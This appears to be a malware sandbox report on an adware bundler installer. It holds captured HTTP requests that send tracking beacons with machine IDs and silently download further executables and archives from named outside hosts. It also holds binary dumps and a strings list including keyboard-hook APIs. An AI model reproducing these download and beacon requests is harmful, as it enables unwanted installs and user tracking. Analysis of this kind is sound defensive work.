M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /sdk/binsis/2.2/BiTool.dll HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d27foqb3kkzkt9.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 59904
Connection: keep-alive
Server: nginx
Date: Thu, 23 Jul 2015 01:04:56 GMT
Last-Modified: Tue, 15 Oct 2013 19:55:30 GMT
ETag: "525d9db2-ea00"
Expires: Thu, 23 Jul 2015 01:14:56 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 111
X-Cache: Hit from cloudfront
Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Wly0idpS8MatCKxKUY8_mR9gi0IR9j6CuMgSs-wgEzo2PspQXgq0zA==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I}.I..h...h...h..S....h..d....h..d....h..d....h..d....h...i.W.h..d....h..d....h..d....h.Rich..h.................PE..L.....]R...........!.........,......e........................................ ......9.....@.....................................................................0...................................`...@...............H............................text..._........................... ..`.rdata..5...........................@..@.data...x...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................U..Q.M..E..M....E...]...........U..Q.M..E.....].U..Q.M...]......U..Q.M..E........E...]..........U..Q.M..E..M.......]............U......M..E..8.t..M.........E....E......E...]...U..Q.M..E..M...3.;......].......U..Q.M..E.3..8........].........U..Q.M..E.P.M........M........E...].............U..Q.M..E........M.........]....U..Q.M..M.......E....t..M.Q.Z.......E...].......U...E.].........U..j.h....d.....PQ.....3.P.E.d......M..M........E......E........M.Q.M...........E......E..M.d......Y..].........U..Q.M..E.......
<<< skipped >>>
GET /data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=8819 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1443214692.dop012.fr7.t,1443214692.cds020.fr7.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Fri, 25 Sep 2015 20:58:12 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1443214692.dop012.fr7.t,1443214692.cds020.fr7.c..GIF89a.............,...........D..;..
GET /installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2919 HTTP/1.1
Accept: */*
Host: mystats.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 280T/EtK73K0JshNYAESQRraEL7QBHnCC5l7hiVFm8Q9BUU8F1NBWYW8mM8Oh4fTvZ2ub bcOHY=
x-amz-request-id: 4A2DCEF8ABFA75DD
Date: Fri, 25 Sep 2015 20:58:14 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 280T/EtK73K0JshNYAESQRraEL7QBHnCC5l7hiVFm8Q9BUU8F1NBWYW8mM8Oh4fTvZ2ub bcOHY=..x-amz-request-id: 4A2DCEF8ABFA75DD..Date: Fri, 25 Sep 2015 20:58:14 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET /crossbrowse/ie/107/ie.zip.002 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=47138
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443214693.dop003.fr7.t,1443214693.cds004.fr7.c
.R...rf..ol......}>....]..m..sr!..m..Mu..v....\..F.....R...[y8...6...7...h.K.52.'.m];."......;........6.Q.Li.T[...<.....P..SJGtW....~......&.{h.X.;<.x...........iX..........qda.....P....6X.....@.(........... .....!E..t......-O..n..z..N.....4s....=0...xa.o....Q..P....z..oNiC. ...{..B.~..B..o.4...UO[.T....Y..f..*..G......h.1...B.I..1...;..3....(...;..M..Q.5..,F.._..$#..K.(..&...Y...O.Q(.>O......UP.<?2_... .%.D..*.H..y...5..U7.#.....J 7.8b...f.r64h.g ....'y.m..M.fW...e..Y.SG..D...a.h..auwR......v......_.s<E.O......Y..n-..hT..p.$J.`>......-...9.2.Is..5...v.~%{b.H.d).......w..m5......X..v~..!.:.K..xEzE...J...V....It..C6...~V6%...uG..bW...........)}..m..|nh..............wB;.M>.E.h..E0..9.....F.ew....J.J......_*4....*{..V(z..}q........u.:tfT...G9'....6......8.....h..r...`s/..kw.H.~...E..r_!.A.U....kbn......2..m]T&&.....p.p,6_.....~........;V.......:.....MI.Vs..'.(..@...B...S...O...<....q.IG....wB$.......Q.&.....4...{^....g..L...e8...b..(n.B<..b5...o......"......!.G.....m^......2.:...^...1xd[..h.^...I...c~.h.....Q.3tv"^k....!.G...d........=:.....5`a....ab$.r'3..:...l..&.d@p...P"..7..w..@.F:.x...o..j..W...%...Cz?.Np......~....GFP ;..Z.......2.~8....R...s......//.7.....l.U>....r.....{0.Gs:......`.pm......_{.".........#d..")..o..-.... ...E.J.....}.XhH;h...4j. ..E..3]g..9.!..T...``r.hwhEbP......L..S/Is|5..`....}|W(...8E76..7...*.l....Wuw....2.....cO..)4c..=X9..zwT...i.`..Rh.......ST.zLL.9..V.}<..<....5.>\H..,...(.l....q>..i2<~.E.F.....b.......\.....j1W.Q...o\s..}.<....$^w.
<<< skipped >>>
GET /data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8567 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:38 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1443214718.dop006.fr7.t,1443214718.cds020.fr7.c
GIF89a.............,...........D..;..
GET /crossbrowse/ie/107/ie.zip.001 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=47125
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443214693.dop005.fr7.t,1443214693.cds027.fr7.c
PK........l..G...nd.T.d.T.....chrome.packed.7z7z..'.....T...T.............*..F......8%D.cT(g.....,r...E^<5....S$<....Z..*...7&.o.,.a&......%...1..5...m...h..=w.|.a.a.Q.{.<..:..9Q,>n...k.....~..aJ.._...KD.V...7.>..3....d......)..6.H..RN...:.....FU.!..j...9....L.&.2.a........ .E.s'T.......vD.z)..}..-.. .&.vF}.$.z.......lw.>..!...'.a..|...L....09E..Y8^.s.O\..C..%.......d.VD....W..d.'..6%...l.7Gk.<..I...5...d !......wT...d...H..7v.E.......{.p.]`.......~w84.rj......;...).q.k..G...........zL...{....>.."........"q..k[.f...F{8...s..c>[69..|...q].(.S..~..1z..>.!AT&i.}....YJ....\i....o..(...4.5.......h|.......6.!...4.p[....@.m.. ^&...A..&E..V.]...T=.v]W.l=A=y.T....R.'f.....60..MR...k...c.1."..jw.7C.N...b....@...@....%..%*!5............iW*y..*......E...D....6....3.P....2.....} .'..!...cG.m...Z.]%{.QZ./e.V-C.a.X.aQ?.....S..1...:.T..C*..hKH....(...aH.r..;..^.l.ikR.X..8..._...^T{B@..'.tga.3."..<. ...........$c9......... .~)/..%.2{...X&.W.....>...bh.L.....U.-.Vf......r..d..9. ..k.'.M...J...v...rU..`3...SWX...G1.`....{.....8.~..x..Q...g.._...1.9.......f8..#p..............]...E.(....J....(H.h..6@'.hc.5....}.1>{..6/.R.....(X.k.<....\.....:p...u..L.....h...K...vaK./.O........'|...8..2...{..9....."&.......Z..K.eJ..4e..)v..[...J$.e........5.G......X..@.o.^Y...%....._.n.:...\......H...0,.f.E...*M.F.f.R.lJ*,...S.....FE*'b.#V.@........a=._.....W... .}.....p.~..(>.....E.1k....3k....F..[.T...,N...............Y7.......G[....rH).E......[.5..K..Q..J#8.-.@.]<eh........2a.c.8...Z....O.....z..2c
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_FIN HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 20:59:00 GMT
Set-Cookie: _c4aid=5E7A8A956FF4495188A597C64EC21ECF; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=5E7A8A956FF4495188A597C64EC21ECF,1443214749.45672; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /download/dwn/prq4633/este/re/setup_gmsd_re.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.taxideataxus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:55 GMT
Server: Apache/2.2.16
Last-Modified: Fri, 25 Sep 2015 15:36:08 GMT
ETag: "230017b-586f10-520941b43c8d4"
Accept-Ranges: bytes
Content-Length: 5795600
Keep-Alive: timeout=15, max=200
Connection: Keep-Alive
Content-Type: application/x-msdos-program
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................0........X..........@..............................P.......(........... cX.............................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...(...........................@..P.............@......................@..P..................................................................................................................................................................string................<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>
GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: prof.eorezo.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:00 GMT
Server: Apache/2.2.22
x-eorezo-crc32: -1
x-eorezo-crypted: 1
x-eorezo-length: 357
Set-Cookie: conftime=1443214740; expires=Wed, 19 Jan 16 14:45:00 GMT; domain=eorezo.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1443214740985864; path=/; expires=Sun, 25-Oct-15 20:59:00 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
1ec..Xg8nssf/4H10OdRv/PBlQCyF9RkAzpy/PPG8paJnu rCw3mAaqFpX2 ZKEgbMMA2htCshaMIPoMPkSppoNIfvqD ZyWxTIl1LyUx8yWjlHHNhn1WF5uF0H6qLM uZMwkTiGldZX5iSj uCsroOrbj/qdFgfbU9hmNOF2lZWiRA4D1nmKWD56o30N03aMe cM TaH0Zt8tkkpVIrV86sjShA2ibI4frmimtvqttCmZq2iOlFsKeYNJxrj/jP12cx2lA7NiBrk4PKXXug7tpKb65atNqDRlvUKKAF9c9zPzn4F2eh8GAfVbPOtZhSf/o/50RLSfemcISdhtiO8gTINReeSoYdUAqhmbrscZPjwnJCjKfgrUbQCV1J0DBwv2J mQsGJZQH4xDticU8Aw3zUoh3vFhu1Wg3CUqlkPjaoTHwm7LcFgkhAy A9qiL9G3nGtxC4eGJD3HM29TeMBpi5wjFtJRirkgPWAr1gnD hmf0=..0..
GET /0.gif?2948573&101&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:25 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
Set-Cookie: CountUid=a66b5300-f6pc-40d2-8fc4-e2443c4c6a10; domain=.histats.com; Max-Age=31536000; Expires=Sat, 24-Sep-2016 20:59:25 GMT
GIF89a.....
GET /crossbrowse/ie/107/ie.zip.005 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=47125
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443214693.dop003.fr7.t,1443214693.cds036.fr7.c
[..Wa<.3.......Y.}S.Q)|.x.P..r._ip`...h.r...@..k.....8..o.D_C.0.h..M...gv......J..g.....a.4..~....A.Y.. .u:7..... i...$.....p...ORP.P... ....._.@......?.F.....8.@..l....{n...XGi......2..........FOqM..N_.}...S*he.I.q.. ..V...=.E....1....M.S.......f3%.?.....Ug.\.}...I..g..w..[....t..yR..DJ3.;.;W...._.....y.:..XZ<..40a.I..A...vUW..,...u"......>..*.....@D...YX.4.......v]...T.$..T.1...2.X..o.X....@.%...n.LL....-..A...n.......uq<.r$..t`M.:c9C..l./....}2.......{.O...7............;...M..x...rwqL.\.. ..b.........*f!..S|..*g...'dl..........eN..km...:.6.....s....n.5..0_r8 D.W...".S/%r.rU..c.......C.v5..C...3..z....\.B.-a..r......|..G..W.....2h..>jSy....Z.........tE...T....R.2...p..Q>...f.fj.#.Z.l....7..h.....>...-..K...<....?....B..........,.....$..~........^..V...Uq.672kCC......i....J....*...K.......0..14....{.Wwf".K.p....;.6.H."6y.q.E~. i.`...hN.....d../\A....hY.$!}3..7.*&.n......Z...Q>W.......`0.q..M..A@*.Y 0..7l"m......0...4..X2.|.C2j.[..K...gu...?.a..s.B.kX......j.t...B@|d.l._.zZ.. ."D(..PD..l?.%..w.....).v,v9m...w........G..C.SU.l7*JlW.....56.....v..{............G..3..0....R......Y.h,u..k.'.....$..&.[.9.. 8..1..DZF....n......l_.......*.R...Q$.3.q\..'...]...k..*..0....^#.|A.v...K...........T.Q.#...^e.c....V\..ysD.Ai^.ly..P.~..lreD.g_.Q.....i..kS.R...f..=9.9..q=D."......-N...C.....%.-..u.....<.qj..:..s......:>.I`.PJ..vQ.K.....o.)qew.K.G....w.....tJ.a4...L.[.......0.0#.),......7....J}*..^`w..Q.h...~e..Ql..*..|}...K.Z.*..'.....|..rp.@_.b..!..R.%....%..m"....W9..$ 1.......VZ..''.1,|..V...
<<< skipped >>>
GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:34 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1442816573"
Last-Modified: Mon, 21 Sep 2015 06:22:53 GMT
Cache-Control: max-age=34604
Content-Length: 104354
Content-Type: application/octet-stream
X-HW: 1443214714.dop004.fr7.t,1443214714.cds007.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@.....................................................................................8............................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata... ...p...........................rsrc...8...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_DCOUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 20:59:00 GMT
Set-Cookie: _c4aid=F47F5BE0A6D640F38FCF6DA2C84845B5; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=F47F5BE0A6D640F38FCF6DA2C84845B5,1443214749.79177; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /smt.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d10huri5h4o4a3.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 211114
Connection: keep-alive
Date: Fri, 14 Aug 2015 19:47:15 GMT
Last-Modified: Wed, 25 Feb 2015 18:08:27 GMT
ETag: "20f288aa7d995a4bfcb240b66383ebf4"
Accept-Ranges: bytes
Server: AmazonS3
Age: 50853
X-Cache: Hit from cloudfront
Via: 1.1 a436b6df4b0d1bd189edf722b5d2a523.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 1pUN6pxltkqUUrxxYlD9n-AUrykekAFJFJyIGEzYXit12UU-XkDQRA==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t....... ...f...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...0...............................rsrc....f... ...h...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /policyname.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d10huri5h4o4a3.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 81086
Connection: keep-alive
Date: Fri, 25 Sep 2015 20:15:12 GMT
Last-Modified: Fri, 25 Sep 2015 20:08:45 GMT
ETag: "37c03079fb3d206e4112f9aa52c41524"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2649
X-Cache: Hit from cloudfront
Via: 1.1 a436b6df4b0d1bd189edf722b5d2a523.cloudfront.net (CloudFront)
X-Amz-Cf-Id: KWkPApmJG8gWHy7_S65EdZGhf-QXiysjAjPfEn-uWxprYhSqMmohog==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@...........................!..............................................t........!..............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc.........!......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
Map
The SpyTool connects to the servers at the folowing location(s):
Strings from Dumps
upgmsd_re_005010096.exe_1928:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
RSSSSSSh
RSSSSSSh
QSShh
QSShh
tFHt:Ht.Ht"Hu`
tFHt:Ht.Ht"Hu`
SSSShp
SSSShp
SSSSh
SSSSh
u$SShe
u$SShe
tWSShW
tWSShW
tl9_ tgSSh
tl9_ tgSSh
t'SShl
t'SShl
SSSShxjn
SSSShxjn
j%XtL9E
j%XtL9E
FtPW
FtPW
SSh@B
SSh@B
u.SSh
u.SSh
tsSSh
tsSSh
FTCP
FTCP
t.WWWSP
t.WWWSP
tAHt.HHt
tAHt.HHt
FTPS
FTPS
u)SShF
u)SShF
s%j.Zf
s%j.Zf
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
operand of unlimited repeat could match the empty string
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
POSIX named classes are supported only within a class
erroffset passed as NULL
erroffset passed as NULL
POSIX collating elements are not supported
POSIX collating elements are not supported
this version of PCRE is not compiled with PCRE_UTF8 support
this version of PCRE is not compiled with PCRE_UTF8 support
PCRE does not support \L, \l, \N, \U, or \u
PCRE does not support \L, \l, \N, \U, or \u
support for \P, \p, and \X has not been compiled
support for \P, \p, and \X has not been compiled
(*VERB) with an argument is not supported
(*VERB) with an argument is not supported
!"#$%&'((()* ,-./01
!"#$%&'((()* ,-./01
CNotSupportedException
CNotSupportedException
CCmdTarget
CCmdTarget
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
CFtpFileFind
CFtpFileFind
CHttpConnection
CHttpConnection
CFtpConnection
CFtpConnection
CHttpFile
CHttpFile
RegDeleteKeyExW
RegDeleteKeyExW
TaskDialogIndirect
TaskDialogIndirect
CMDITabProxyWnd
CMDITabProxyWnd
CMDIChildWndEx
CMDIChildWndEx
CMDIFrameWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIChildWnd
CMDIFrameWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMDIClientAreaWnd
CHotKeyCtrl
CHotKeyCtrl
CMFCToolBarsKeyboardPropertyPage
CMFCToolBarsKeyboardPropertyPage
GetProcessWindowStation
GetProcessWindowStation
operator
operator
portuguese-brazilian
portuguese-brazilian
qR.Rd
qR.Rd
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
%%X
%%X
RegSetKeySecurity error! (rc=%lu)
RegSetKeySecurity error! (rc=%lu)
Key not found.
Key not found.
Error opening key.
Error opening key.
ntdll.dll
ntdll.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
LookupPrivilegeValue error: %u
LookupPrivilegeValue error: %u
Error %d: Could not begin update of %s
Error %d: Could not begin update of %s
Error %d: Updating resource
Error %d: Updating resource
!"#$%&'()* ,-./:;?@[\]^_`{|}~
!"#$%&'()* ,-./:;?@[\]^_`{|}~
C:\appbuilder_2.0_multiinstall\Release\temp.pdb
C:\appbuilder_2.0_multiinstall\Release\temp.pdb
IPHLPAPI.DLL
IPHLPAPI.DLL
PSAPI.DLL
PSAPI.DLL
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
SetWindowsHookExW
SetWindowsHookExW
CreateDialogIndirectParamW
CreateDialogIndirectParamW
UnhookWindowsHookEx
UnhookWindowsHookEx
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
GetAsyncKeyState
GetAsyncKeyState
MapVirtualKeyW
MapVirtualKeyW
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardState
GetKeyboardState
GetKeyNameTextW
GetKeyNameTextW
MapVirtualKeyExW
MapVirtualKeyExW
EnumChildWindows
EnumChildWindows
USER32.dll
USER32.dll
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
MSIMG32.dll
MSIMG32.dll
COMDLG32.dll
COMDLG32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegLoadKeyW
RegLoadKeyW
RegUnLoadKeyW
RegUnLoadKeyW
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegSetKeySecurity
RegSetKeySecurity
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExW
